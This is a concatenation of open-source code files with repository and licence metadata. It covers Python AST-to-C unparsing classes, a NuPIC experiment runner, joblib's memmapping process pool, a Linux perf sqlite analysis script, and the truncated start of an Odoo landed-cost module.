'''Create a parenthesized expression''' 
Exp.__init__(self, line_no) self.exp = exp def replicate(self): '''Replicate this abstract syntax tree node''' return ParenthExp(self.exp.replicate(), self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return '(' + str(self.exp) + ')' def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' return '(' + self.exp.unparseToC(indent, extra_indent) + ')' #----------------------------------------------- # Statement #----------------------------------------------- class Stmt(AST): def __init__(self, line_no = ''): '''Create a statement''' AST.__init__(self, line_no) #----------------------------------------------- # Expression Statement #----------------------------------------------- class ExpStmt(Stmt): def __init__(self, exp, line_no = ''): '''Create an expression statement''' Stmt.__init__(self, line_no) self.exp = exp # may be null def replicate(self): '''Replicate this abstract syntax tree node''' r_e = self.exp if r_e != None: r_e = r_e.replicate() return ExpStmt(r_e, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = '' if self.exp != None: s += str(self.exp) s += '; ' return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = indent if self.exp != None: s += self.exp.unparseToC(indent, extra_indent) s += '; \n' return s #----------------------------------------------- # Compound Statement #----------------------------------------------- class CompStmt(Stmt): def __init__(self, stmts, line_no = ''): '''Create a compound statement''' Stmt.__init__(self, line_no) self.stmts = stmts def replicate(self): '''Replicate this abstract syntax tree node''' return CompStmt([s.replicate() for s in self.stmts], self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = '{' for i, t in enumerate(self.stmts): if 
(i > 0): s += ' ' s += str(t) s += '}' return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = indent + '{ \n' for stmt in self.stmts: s += stmt.unparseToC(indent + extra_indent, extra_indent) s += indent + '} \n' return s #----------------------------------------------- # If-Then-Else #----------------------------------------------- class IfStmt(Stmt): def __init__(self, test, true_stmt, false_stmt = None, line_no = ''): '''Create an if statement''' Stmt.__init__(self, line_no) self.test = test self.true_stmt = true_stmt self.false_stmt = false_stmt # may be null def replicate(self): '''Replicate this abstract syntax tree node''' f_s = self.false_stmt if f_s: f_s = f_s.replicate() return IfStmt(self.test.replicate(), self.true_stmt.replicate(), f_s, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = 'if (' + str(self.test) + ') ' + str(self.true_stmt) if self.false_stmt: s += ' else ' + str(self.false_stmt) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = indent + 'if (' + self.test.unparseToC(indent, extra_indent) + ') \n' s += self.true_stmt.unparseToC(indent + extra_indent, extra_indent) if self.false_stmt: s += indent + 'else \n' s += self.false_stmt.unparseToC(indent + extra_indent, extra_indent) return s #----------------------------------------------- # For Loop #----------------------------------------------- class ForStmt(Stmt): def __init__(self, init, test, iter, stmt, line_no = ''): '''Create a for-loop statement''' Stmt.__init__(self, line_no) self.init = init # may be null self.test = test # may be null self.iter = iter # may be null self.stmt = stmt def replicate(self): '''Replicate this abstract syntax tree node''' r_in = self.init r_t = self.test r_it = self.iter if r_in: r_in = r_in.replicate() if r_t: r_t = r_t.replicate() if r_it: r_it = r_it.replicate() 
return ForStmt(r_in, r_t, r_it, self.stmt.replicate(), self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = 'for (' if self.init: s += str(self.init) s += '; ' if self.test: s += str(self.test) s += '; ' if self.iter: s += str(self.iter) s += ') ' + str(self.stmt) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = '\n' s += indent + 'for (' if self.init: s += self.init.unparseToC(indent, extra_indent) s += '; ' if self.test: s += self.test.unparseToC(indent, extra_indent) s += '; ' if self.iter: s += self.iter.unparseToC(indent, extra_indent) s += ') ' + self.stmt.unparseToC(indent + extra_indent, extra_indent) return s #----------------------------------------------- # Transformation #----------------------------------------------- class TransformStmt(Stmt): def __init__(self, name, kw_args, stmt, line_no = ''): '''Create a transformation statement''' Stmt.__init__(self, line_no) self.name = name self.kw_args = kw_args self.stmt = stmt def replicate(self): '''Replicate this abstract syntax tree node''' return TransformStmt(self.name, [k.replicate() for k in self.kw_args], self.stmt.replicate(), self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = 'transform ' + str(self.name) + ' (' for i, k in enumerate(self.kw_args): if i > 0: s += ', ' s += str(k) s += ') ' + str(self.stmt) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' print 'internal error: a transformation statement is never generated as output' sys.exit(1) #----------------------------------------------- # New AST #----------------------------------------------- class NewAST(AST): def __init__(self, line_no = ''): '''Create a newly-added statement''' AST.__init__(self, line_no) #----------------------------------------------- # Variable Declaration 
#----------------------------------------------- class VarDecl(NewAST): def __init__(self, type_name, var_names, line_no = ''): '''Create a variable declaration''' NewAST.__init__(self, line_no) self.type_name = type_name self.var_names = var_names def replicate(self): '''Replicate this abstract syntax tree node''' return VarDecl(self.type_name, self.var_names[:], self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = '' s += self.type_name + ' ' s += ', '.join(map(str, self.var_names)) s += '; ' return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = '' s += indent + self.type_name + ' ' s += ', '.join(map(lambda x: x.unparseToC(indent, extra_indent), self.var_names)) s += '; \n' return s
gpl-3.0
virneo/nupic
scripts/run_opf_experiment.py
37
1210
#!/usr/bin/env python # ---------------------------------------------------------------------- # Numenta Platform for Intelligent Computing (NuPIC) # Copyright (C) 2013, Numenta, Inc. Unless you have an agreement # with Numenta, Inc., for a separate license for this software code, the # following terms and conditions apply: # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Affero Public License for more details. # # You should have received a copy of the GNU Affero Public License # along with this program. If not, see http://www.gnu.org/licenses. # # http://numenta.org/licenses/ # ---------------------------------------------------------------------- """This script is a command-line client of Online Prediction Framework (OPF). It executes a single experiment. """ from nupic.frameworks.opf.experiment_runner import main if __name__ == "__main__": main()
agpl-3.0
B-UMMI/INNUca
src/SPAdes-3.11.1-Linux/share/spades/joblib3/pool.py
237
23894
"""Custom implementation of multiprocessing.Pool with custom pickler This module provides efficient ways of working with data stored in shared memory with numpy.memmap arrays without inducing any memory copy between the parent and child processes. This module should not be imported if multiprocessing is not available as it implements subclasses of multiprocessing Pool that uses a custom alternative to SimpleQueue. """ # Author: Olivier Grisel <olivier.grisel@ensta.org> # Copyright: 2012, Olivier Grisel # License: BSD 3 clause from mmap import mmap import errno import os import stat import sys import threading import atexit import tempfile import shutil try: # Python 2 compat from cPickle import loads from cPickle import dumps except ImportError: from pickle import loads from pickle import dumps import copyreg # Customizable pure Python pickler in Python 2 # customizable C-optimized pickler under Python 3.3+ from pickle import Pickler from pickle import HIGHEST_PROTOCOL from io import BytesIO from ._multiprocessing_helpers import mp, assert_spawning # We need the class definition to derive from it not the multiprocessing.Pool # factory function from multiprocessing.pool import Pool try: import numpy as np from numpy.lib.stride_tricks import as_strided except ImportError: np = None from .numpy_pickle import load from .numpy_pickle import dump from .hashing import hash # Some system have a ramdisk mounted by default, we can use it instead of /tmp # as the default folder to dump big arrays to share with subprocesses SYSTEM_SHARED_MEM_FS = '/dev/shm' # Folder and file permissions to chmod temporary files generated by the # memmaping pool. Only the owner of the Python process can access the # temporary files and folder. 
FOLDER_PERMISSIONS = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR FILE_PERMISSIONS = stat.S_IRUSR | stat.S_IWUSR ############################################################################### # Support for efficient transient pickling of numpy data structures def _get_backing_memmap(a): """Recursively look up the original np.memmap instance base if any""" b = getattr(a, 'base', None) if b is None: # TODO: check scipy sparse datastructure if scipy is installed # a nor its descendants do not have a memmap base return None elif isinstance(b, mmap): # a is already a real memmap instance. return a else: # Recursive exploration of the base ancestry return _get_backing_memmap(b) def has_shareable_memory(a): """Return True if a is backed by some mmap buffer directly or not""" return _get_backing_memmap(a) is not None def _strided_from_memmap(filename, dtype, mode, offset, order, shape, strides, total_buffer_len): """Reconstruct an array view on a memmory mapped file""" if mode == 'w+': # Do not zero the original data when unpickling mode = 'r+' if strides is None: # Simple, contiguous memmap return np.memmap(filename, dtype=dtype, shape=shape, mode=mode, offset=offset, order=order) else: # For non-contiguous data, memmap the total enclosing buffer and then # extract the non-contiguous view with the stride-tricks API base = np.memmap(filename, dtype=dtype, shape=total_buffer_len, mode=mode, offset=offset, order=order) return as_strided(base, shape=shape, strides=strides) def _reduce_memmap_backed(a, m): """Pickling reduction for memmap backed arrays a is expected to be an instance of np.ndarray (or np.memmap) m is expected to be an instance of np.memmap on the top of the ``base`` attribute ancestry of a. ``m.base`` should be the real python mmap object. 
""" # offset that comes from the striding differences between a and m a_start, a_end = np.byte_bounds(a) m_start = np.byte_bounds(m)[0] offset = a_start - m_start # offset from the backing memmap offset += m.offset if m.flags['F_CONTIGUOUS']: order = 'F' else: # The backing memmap buffer is necessarily contiguous hence C if not # Fortran order = 'C' if a.flags['F_CONTIGUOUS'] or a.flags['C_CONTIGUOUS']: # If the array is a contiguous view, no need to pass the strides strides = None total_buffer_len = None else: # Compute the total number of items to map from which the strided # view will be extracted. strides = a.strides total_buffer_len = (a_end - a_start) // a.itemsize return (_strided_from_memmap, (m.filename, a.dtype, m.mode, offset, order, a.shape, strides, total_buffer_len)) def reduce_memmap(a): """Pickle the descriptors of a memmap instance to reopen on same file""" m = _get_backing_memmap(a) if m is not None: # m is a real mmap backed memmap instance, reduce a preserving striding # information return _reduce_memmap_backed(a, m) else: # This memmap instance is actually backed by a regular in-memory # buffer: this can happen when using binary operators on numpy.memmap # instances return (loads, (dumps(np.asarray(a), protocol=HIGHEST_PROTOCOL),)) class ArrayMemmapReducer(object): """Reducer callable to dump large arrays to memmap files. Parameters ---------- max_nbytes: int Threshold to trigger memmaping of large arrays to files created a folder. temp_folder: str Path of a folder where files for backing memmaped arrays are created. mmap_mode: 'r', 'r+' or 'c' Mode for the created memmap datastructure. See the documentation of numpy.memmap for more details. Note: 'w+' is coerced to 'r+' automatically to avoid zeroing the data on unpickling. verbose: int, optional, 0 by default If verbose > 0, memmap creations are logged. If verbose > 1, both memmap creations, reuse and array pickling are logged. 
context_id: int, optional, None by default Set to a value identifying a call context to spare costly hashing of the content of the input arrays when it is safe to assume that each array will not be mutated by the parent process for the duration of the dispatch process. This is the case when using the high level Parallel API. It might not be the case when using the MemmapingPool API directly. prewarm: bool, optional, False by default. Force a read on newly memmaped array to make sure that OS pre-cache it memory. This can be useful to avoid concurrent disk access when the same data array is passed to different worker processes. """ def __init__(self, max_nbytes, temp_folder, mmap_mode, verbose=0, context_id=None, prewarm=True): self._max_nbytes = max_nbytes self._temp_folder = temp_folder self._mmap_mode = mmap_mode self.verbose = int(verbose) self._context_id = context_id self._prewarm = prewarm def __call__(self, a): m = _get_backing_memmap(a) if m is not None: # a is already backed by a memmap file, let's reuse it directly return _reduce_memmap_backed(a, m) if (not a.dtype.hasobject and self._max_nbytes is not None and a.nbytes > self._max_nbytes): # check that the folder exists (lazily create the pool temp folder # if required) try: os.makedirs(self._temp_folder) os.chmod(self._temp_folder, FOLDER_PERMISSIONS) except OSError as e: if e.errno != errno.EEXIST: raise e # Find a unique, concurrent safe filename for writing the # content of this array only once. if self._context_id is not None: marker = self._context_id else: marker = hash(a) basename = "%d-%d-%d-%s.pkl" % ( os.getpid(), id(threading.current_thread()), id(a), marker) filename = os.path.join(self._temp_folder, basename) # In case the same array with the same content is passed several # times to the pool subprocess children, serialize it only once # XXX: implement an explicit reference counting scheme to make it # possible to delete temporary files as soon as the workers are # done processing this data. 
if not os.path.exists(filename): if self.verbose > 0: print("Memmaping (shape=%r, dtype=%s) to new file %s" % ( a.shape, a.dtype, filename)) for dumped_filename in dump(a, filename): os.chmod(dumped_filename, FILE_PERMISSIONS) if self._prewarm: # Warm up the data to avoid concurrent disk access in # multiple children processes load(filename, mmap_mode=self._mmap_mode).max() elif self.verbose > 1: print("Memmaping (shape=%s, dtype=%s) to old file %s" % ( a.shape, a.dtype, filename)) # Let's use the memmap reducer return reduce_memmap(load(filename, mmap_mode=self._mmap_mode)) else: # do not convert a into memmap, let pickler do its usual copy with # the default system pickler if self.verbose > 1: print("Pickling array (shape=%r, dtype=%s)." % ( a.shape, a.dtype)) return (loads, (dumps(a, protocol=HIGHEST_PROTOCOL),)) ############################################################################### # Enable custom pickling in Pool queues class CustomizablePickler(Pickler): """Pickler that accepts custom reducers. HIGHEST_PROTOCOL is selected by default as this pickler is used to pickle ephemeral datastructures for interprocess communication hence no backward compatibility is required. `reducers` is expected expected to be a dictionary with key/values being `(type, callable)` pairs where `callable` is a function that give an instance of `type` will return a tuple `(constructor, tuple_of_objects)` to rebuild an instance out of the pickled `tuple_of_objects` as would return a `__reduce__` method. See the standard library documentation on pickling for more details. """ # We override the pure Python pickler as its the only way to be able to # customize the dispatch table without side effects in Python 2.6 # to 3.2. For Python 3.3+ leverage the new dispatch_table # feature from http://bugs.python.org/issue14166 that makes it possible # to use the C implementation of the Pickler which is faster. 
def __init__(self, writer, reducers=None, protocol=HIGHEST_PROTOCOL): Pickler.__init__(self, writer, protocol=protocol) if reducers is None: reducers = {} if hasattr(Pickler, 'dispatch'): # Make the dispatch registry an instance level attribute instead of # a reference to the class dictionary under Python 2 self.dispatch = Pickler.dispatch.copy() else: # Under Python 3 initialize the dispatch table with a copy of the # default registry self.dispatch_table = copyreg.dispatch_table.copy() for type, reduce_func in reducers.items(): self.register(type, reduce_func) def register(self, type, reduce_func): if hasattr(Pickler, 'dispatch'): # Python 2 pickler dispatching is not explicitly customizable. # Let us use a closure to workaround this limitation. def dispatcher(self, obj): reduced = reduce_func(obj) self.save_reduce(obj=obj, *reduced) self.dispatch[type] = dispatcher else: self.dispatch_table[type] = reduce_func class CustomizablePicklingQueue(object): """Locked Pipe implementation that uses a customizable pickler. This class is an alternative to the multiprocessing implementation of SimpleQueue in order to make it possible to pass custom pickling reducers, for instance to avoid memory copy when passing memmory mapped datastructures. `reducers` is expected expected to be a dictionary with key/values being `(type, callable)` pairs where `callable` is a function that give an instance of `type` will return a tuple `(constructor, tuple_of_objects)` to rebuild an instance out of the pickled `tuple_of_objects` as would return a `__reduce__` method. See the standard library documentation on pickling for more details. 
""" def __init__(self, context, reducers=None): self._reducers = reducers self._reader, self._writer = context.Pipe(duplex=False) self._rlock = context.Lock() if sys.platform == 'win32': self._wlock = None else: self._wlock = context.Lock() self._make_methods() def __getstate__(self): assert_spawning(self) return (self._reader, self._writer, self._rlock, self._wlock, self._reducers) def __setstate__(self, state): (self._reader, self._writer, self._rlock, self._wlock, self._reducers) = state self._make_methods() def empty(self): return not self._reader.poll() def _make_methods(self): self._recv = recv = self._reader.recv racquire, rrelease = self._rlock.acquire, self._rlock.release def get(): racquire() try: return recv() finally: rrelease() self.get = get if self._reducers: def send(obj): buffer = BytesIO() CustomizablePickler(buffer, self._reducers).dump(obj) self._writer.send_bytes(buffer.getvalue()) self._send = send else: self._send = send = self._writer.send if self._wlock is None: # writes to a message oriented win32 pipe are atomic self.put = send else: wlock_acquire, wlock_release = ( self._wlock.acquire, self._wlock.release) def put(obj): wlock_acquire() try: return send(obj) finally: wlock_release() self.put = put class PicklingPool(Pool): """Pool implementation with customizable pickling reducers. This is useful to control how data is shipped between processes and makes it possible to use shared memory without useless copies induces by the default pickling methods of the original objects passed as arguments to dispatch. `forward_reducers` and `backward_reducers` are expected to be dictionaries with key/values being `(type, callable)` pairs where `callable` is a function that give an instance of `type` will return a tuple `(constructor, tuple_of_objects)` to rebuild an instance out of the pickled `tuple_of_objects` as would return a `__reduce__` method. See the standard library documentation on pickling for more details. 
""" def __init__(self, processes=None, forward_reducers=None, backward_reducers=None, **kwargs): if forward_reducers is None: forward_reducers = dict() if backward_reducers is None: backward_reducers = dict() self._forward_reducers = forward_reducers self._backward_reducers = backward_reducers poolargs = dict(processes=processes) poolargs.update(kwargs) super(PicklingPool, self).__init__(**poolargs) def _setup_queues(self): context = getattr(self, '_ctx', mp) self._inqueue = CustomizablePicklingQueue(context, self._forward_reducers) self._outqueue = CustomizablePicklingQueue(context, self._backward_reducers) self._quick_put = self._inqueue._send self._quick_get = self._outqueue._recv def delete_folder(folder_path): """Utility function to cleanup a temporary folder if still existing""" if os.path.exists(folder_path): shutil.rmtree(folder_path) class MemmapingPool(PicklingPool): """Process pool that shares large arrays to avoid memory copy. This drop-in replacement for `multiprocessing.pool.Pool` makes it possible to work efficiently with shared memory in a numpy context. Existing instances of numpy.memmap are preserved: the child suprocesses will have access to the same shared memory in the original mode except for the 'w+' mode that is automatically transformed as 'r+' to avoid zeroing the original data upon instantiation. Furthermore large arrays from the parent process are automatically dumped to a temporary folder on the filesystem such as child processes to access their content via memmaping (file system backed shared memory). Note: it is important to call the terminate method to collect the temporary folder used by the pool. Parameters ---------- processes: int, optional Number of worker processes running concurrently in the pool. initializer: callable, optional Callable executed on worker process creation. initargs: tuple, optional Arguments passed to the initializer callable. 
temp_folder: str, optional Folder to be used by the pool for memmaping large arrays for sharing memory with worker processes. If None, this will try in order: - a folder pointed by the JOBLIB_TEMP_FOLDER environment variable, - /dev/shm if the folder exists and is writable: this is a RAMdisk filesystem available by default on modern Linux distributions, - the default system temporary folder that can be overridden with TMP, TMPDIR or TEMP environment variables, typically /tmp under Unix operating systems. max_nbytes int or None, optional, 1e6 by default Threshold on the size of arrays passed to the workers that triggers automated memmory mapping in temp_folder. Use None to disable memmaping of large arrays. forward_reducers: dictionary, optional Reducers used to pickle objects passed from master to worker processes: see below. backward_reducers: dictionary, optional Reducers used to pickle return values from workers back to the master process. verbose: int, optional Make it possible to monitor how the communication of numpy arrays with the subprocess is handled (pickling or memmaping) context_id: int, optional, None by default Set to a value identifying a call context to spare costly hashing of the content of the input arrays when it is safe to assume that each array will not be mutated by the parent process for the duration of the dispatch process. This is the case when using the high level Parallel API. prewarm: bool or str, optional, "auto" by default. If True, force a read on newly memmaped array to make sure that OS pre- cache it in memory. This can be useful to avoid concurrent disk access when the same data array is passed to different worker processes. If "auto" (by default), prewarm is set to True, unless the Linux shared memory partition /dev/shm is available and used as temp_folder. 
`forward_reducers` and `backward_reducers` are expected to be dictionaries with key/values being `(type, callable)` pairs where `callable` is a function that give an instance of `type` will return a tuple `(constructor, tuple_of_objects)` to rebuild an instance out of the pickled `tuple_of_objects` as would return a `__reduce__` method. See the standard library documentation on pickling for more details. """ def __init__(self, processes=None, temp_folder=None, max_nbytes=1e6, mmap_mode='r', forward_reducers=None, backward_reducers=None, verbose=0, context_id=None, prewarm=False, **kwargs): if forward_reducers is None: forward_reducers = dict() if backward_reducers is None: backward_reducers = dict() # Prepare a sub-folder name for the serialization of this particular # pool instance (do not create in advance to spare FS write access if # no array is to be dumped): use_shared_mem = False pool_folder_name = "joblib_memmaping_pool_%d_%d" % ( os.getpid(), id(self)) if temp_folder is None: temp_folder = os.environ.get('JOBLIB_TEMP_FOLDER', None) if temp_folder is None: if os.path.exists(SYSTEM_SHARED_MEM_FS): try: temp_folder = SYSTEM_SHARED_MEM_FS pool_folder = os.path.join(temp_folder, pool_folder_name) if not os.path.exists(pool_folder): os.makedirs(pool_folder) use_shared_mem = True except IOError: # Missing rights in the the /dev/shm partition, # fallback to regular temp folder. 
temp_folder = None if temp_folder is None: # Fallback to the default tmp folder, typically /tmp temp_folder = tempfile.gettempdir() temp_folder = os.path.abspath(os.path.expanduser(temp_folder)) pool_folder = os.path.join(temp_folder, pool_folder_name) self._temp_folder = pool_folder # Register the garbage collector at program exit in case caller forgets # to call terminate explicitly: note we do not pass any reference to # self to ensure that this callback won't prevent garbage collection of # the pool instance and related file handler resources such as POSIX # semaphores and pipes atexit.register(lambda: delete_folder(pool_folder)) if np is not None: # Register smart numpy.ndarray reducers that detects memmap backed # arrays and that is alse able to dump to memmap large in-memory # arrays over the max_nbytes threshold if prewarm == "auto": prewarm = not use_shared_mem forward_reduce_ndarray = ArrayMemmapReducer( max_nbytes, pool_folder, mmap_mode, verbose, context_id=context_id, prewarm=prewarm) forward_reducers[np.ndarray] = forward_reduce_ndarray forward_reducers[np.memmap] = reduce_memmap # Communication from child process to the parent process always # pickles in-memory numpy.ndarray without dumping them as memmap # to avoid confusing the caller and make it tricky to collect the # temporary folder backward_reduce_ndarray = ArrayMemmapReducer( None, pool_folder, mmap_mode, verbose) backward_reducers[np.ndarray] = backward_reduce_ndarray backward_reducers[np.memmap] = reduce_memmap poolargs = dict( processes=processes, forward_reducers=forward_reducers, backward_reducers=backward_reducers) poolargs.update(kwargs) super(MemmapingPool, self).__init__(**poolargs) def terminate(self): super(MemmapingPool, self).terminate() delete_folder(self._temp_folder)
gpl-3.0
cwhuang/linux
tools/perf/scripts/python/event_analyzing_sample.py
4719
7393
# event_analyzing_sample.py: general event handler in python # # Current perf report is already very powerful with the annotation integrated, # and this script is not trying to be as powerful as perf report, but # providing end user/developer a flexible way to analyze the events other # than trace points. # # The 2 database related functions in this script just show how to gather # the basic information, and users can modify and write their own functions # according to their specific requirement. # # The first function "show_general_events" just does a basic grouping for all # generic events with the help of sqlite, and the 2nd one "show_pebs_ll" is # for a x86 HW PMU event: PEBS with load latency data. # import os import sys import math import struct import sqlite3 sys.path.append(os.environ['PERF_EXEC_PATH'] + \ '/scripts/python/Perf-Trace-Util/lib/Perf/Trace') from perf_trace_context import * from EventClass import * # # If the perf.data has a big number of samples, then the insert operation # will be very time consuming (about 10+ minutes for 10000 samples) if the # .db database is on disk. Move the .db file to RAM based FS to speedup # the handling, which will cut the time down to several seconds. # con = sqlite3.connect("/dev/shm/perf.db") con.isolation_level = None def trace_begin(): print "In trace_begin:\n" # # Will create several tables at the start, pebs_ll is for PEBS data with # load latency info, while gen_events is for general event. # con.execute(""" create table if not exists gen_events ( name text, symbol text, comm text, dso text );""") con.execute(""" create table if not exists pebs_ll ( name text, symbol text, comm text, dso text, flags integer, ip integer, status integer, dse integer, dla integer, lat integer );""") # # Create and insert event object to a database so that user could # do more analysis with simple database commands. 
# def process_event(param_dict): event_attr = param_dict["attr"] sample = param_dict["sample"] raw_buf = param_dict["raw_buf"] comm = param_dict["comm"] name = param_dict["ev_name"] # Symbol and dso info are not always resolved if (param_dict.has_key("dso")): dso = param_dict["dso"] else: dso = "Unknown_dso" if (param_dict.has_key("symbol")): symbol = param_dict["symbol"] else: symbol = "Unknown_symbol" # Create the event object and insert it to the right table in database event = create_event(name, comm, dso, symbol, raw_buf) insert_db(event) def insert_db(event): if event.ev_type == EVTYPE_GENERIC: con.execute("insert into gen_events values(?, ?, ?, ?)", (event.name, event.symbol, event.comm, event.dso)) elif event.ev_type == EVTYPE_PEBS_LL: event.ip &= 0x7fffffffffffffff event.dla &= 0x7fffffffffffffff con.execute("insert into pebs_ll values (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (event.name, event.symbol, event.comm, event.dso, event.flags, event.ip, event.status, event.dse, event.dla, event.lat)) def trace_end(): print "In trace_end:\n" # We show the basic info for the 2 type of event classes show_general_events() show_pebs_ll() con.close() # # As the event number may be very big, so we can't use linear way # to show the histogram in real number, but use a log2 algorithm. 
# def num2sym(num): # Each number will have at least one '#' snum = '#' * (int)(math.log(num, 2) + 1) return snum def show_general_events(): # Check the total record number in the table count = con.execute("select count(*) from gen_events") for t in count: print "There is %d records in gen_events table" % t[0] if t[0] == 0: return print "Statistics about the general events grouped by thread/symbol/dso: \n" # Group by thread commq = con.execute("select comm, count(comm) from gen_events group by comm order by -count(comm)") print "\n%16s %8s %16s\n%s" % ("comm", "number", "histogram", "="*42) for row in commq: print "%16s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by symbol print "\n%32s %8s %16s\n%s" % ("symbol", "number", "histogram", "="*58) symbolq = con.execute("select symbol, count(symbol) from gen_events group by symbol order by -count(symbol)") for row in symbolq: print "%32s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by dso print "\n%40s %8s %16s\n%s" % ("dso", "number", "histogram", "="*74) dsoq = con.execute("select dso, count(dso) from gen_events group by dso order by -count(dso)") for row in dsoq: print "%40s %8d %s" % (row[0], row[1], num2sym(row[1])) # # This function just shows the basic info, and we could do more with the # data in the tables, like checking the function parameters when some # big latency events happen. 
# def show_pebs_ll(): count = con.execute("select count(*) from pebs_ll") for t in count: print "There is %d records in pebs_ll table" % t[0] if t[0] == 0: return print "Statistics about the PEBS Load Latency events grouped by thread/symbol/dse/latency: \n" # Group by thread commq = con.execute("select comm, count(comm) from pebs_ll group by comm order by -count(comm)") print "\n%16s %8s %16s\n%s" % ("comm", "number", "histogram", "="*42) for row in commq: print "%16s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by symbol print "\n%32s %8s %16s\n%s" % ("symbol", "number", "histogram", "="*58) symbolq = con.execute("select symbol, count(symbol) from pebs_ll group by symbol order by -count(symbol)") for row in symbolq: print "%32s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by dse dseq = con.execute("select dse, count(dse) from pebs_ll group by dse order by -count(dse)") print "\n%32s %8s %16s\n%s" % ("dse", "number", "histogram", "="*58) for row in dseq: print "%32s %8d %s" % (row[0], row[1], num2sym(row[1])) # Group by latency latq = con.execute("select lat, count(lat) from pebs_ll group by lat order by lat") print "\n%32s %8s %16s\n%s" % ("latency", "number", "histogram", "="*58) for row in latq: print "%32s %8d %s" % (row[0], row[1], num2sym(row[1])) def trace_unhandled(event_name, context, event_fields_dict): print ' '.join(['%s=%s'%(k,str(v))for k,v in sorted(event_fields_dict.items())])
gpl-2.0
jiangzhixiao/odoo
addons/stock_landed_costs/stock_landed_costs.py
42
22915
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import fields, osv import openerp.addons.decimal_precision as dp from openerp.exceptions import Warning from openerp.tools import float_compare, float_round from openerp.tools.translate import _ import product from openerp import SUPERUSER_ID class stock_landed_cost(osv.osv): _name = 'stock.landed.cost' _description = 'Stock Landed Cost' _inherit = 'mail.thread' _track = { 'state': { 'stock_landed_costs.mt_stock_landed_cost_open': lambda self, cr, uid, obj, ctx=None: obj['state'] == 'done', }, } def _total_amount(self, cr, uid, ids, name, args, context=None): result = {} for cost in self.browse(cr, uid, ids, context=context): total = 0.0 for line in cost.cost_lines: total += line.price_unit result[cost.id] = total return result def _get_cost_line(self, cr, uid, ids, context=None): cost_to_recompute = [] for line in self.pool.get('stock.landed.cost.lines').browse(cr, uid, ids, context=context): cost_to_recompute.append(line.cost_id.id) return cost_to_recompute def get_valuation_lines(self, cr, uid, ids, picking_ids=None, 
context=None): picking_obj = self.pool.get('stock.picking') lines = [] if not picking_ids: return lines for picking in picking_obj.browse(cr, uid, picking_ids): for move in picking.move_lines: #it doesn't make sense to make a landed cost for a product that isn't set as being valuated in real time at real cost if move.product_id.valuation != 'real_time' or move.product_id.cost_method != 'real': continue total_cost = 0.0 weight = move.product_id and move.product_id.weight * move.product_qty volume = move.product_id and move.product_id.volume * move.product_qty for quant in move.quant_ids: total_cost += quant.cost * quant.qty vals = dict(product_id=move.product_id.id, move_id=move.id, quantity=move.product_qty, former_cost=total_cost, weight=weight, volume=volume) lines.append(vals) if not lines: raise osv.except_osv(_('Error!'), _('The selected picking does not contain any move that would be impacted by landed costs. Landed costs are only possible for products configured in real time valuation with real price costing method. 
Please make sure it is the case, or you selected the correct picking')) return lines _columns = { 'name': fields.char('Name', track_visibility='always', readonly=True, copy=False), 'date': fields.date('Date', required=True, states={'done': [('readonly', True)]}, track_visibility='onchange', copy=False), 'picking_ids': fields.many2many('stock.picking', string='Pickings', states={'done': [('readonly', True)]}, copy=False), 'cost_lines': fields.one2many('stock.landed.cost.lines', 'cost_id', 'Cost Lines', states={'done': [('readonly', True)]}, copy=True), 'valuation_adjustment_lines': fields.one2many('stock.valuation.adjustment.lines', 'cost_id', 'Valuation Adjustments', states={'done': [('readonly', True)]}), 'description': fields.text('Item Description', states={'done': [('readonly', True)]}), 'amount_total': fields.function(_total_amount, type='float', string='Total', digits_compute=dp.get_precision('Account'), store={ 'stock.landed.cost': (lambda self, cr, uid, ids, c={}: ids, ['cost_lines'], 20), 'stock.landed.cost.lines': (_get_cost_line, ['price_unit', 'quantity', 'cost_id'], 20), }, track_visibility='always' ), 'state': fields.selection([('draft', 'Draft'), ('done', 'Posted'), ('cancel', 'Cancelled')], 'State', readonly=True, track_visibility='onchange', copy=False), 'account_move_id': fields.many2one('account.move', 'Journal Entry', readonly=True, copy=False), 'account_journal_id': fields.many2one('account.journal', 'Account Journal', required=True, states={'done': [('readonly', True)]}), } _defaults = { 'name': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'stock.landed.cost'), 'state': 'draft', 'date': fields.date.context_today, } def _create_accounting_entries(self, cr, uid, line, move_id, qty_out, context=None): product_obj = self.pool.get('product.template') cost_product = line.cost_line_id and line.cost_line_id.product_id if not cost_product: return False accounts = product_obj.get_product_accounts(cr, uid, 
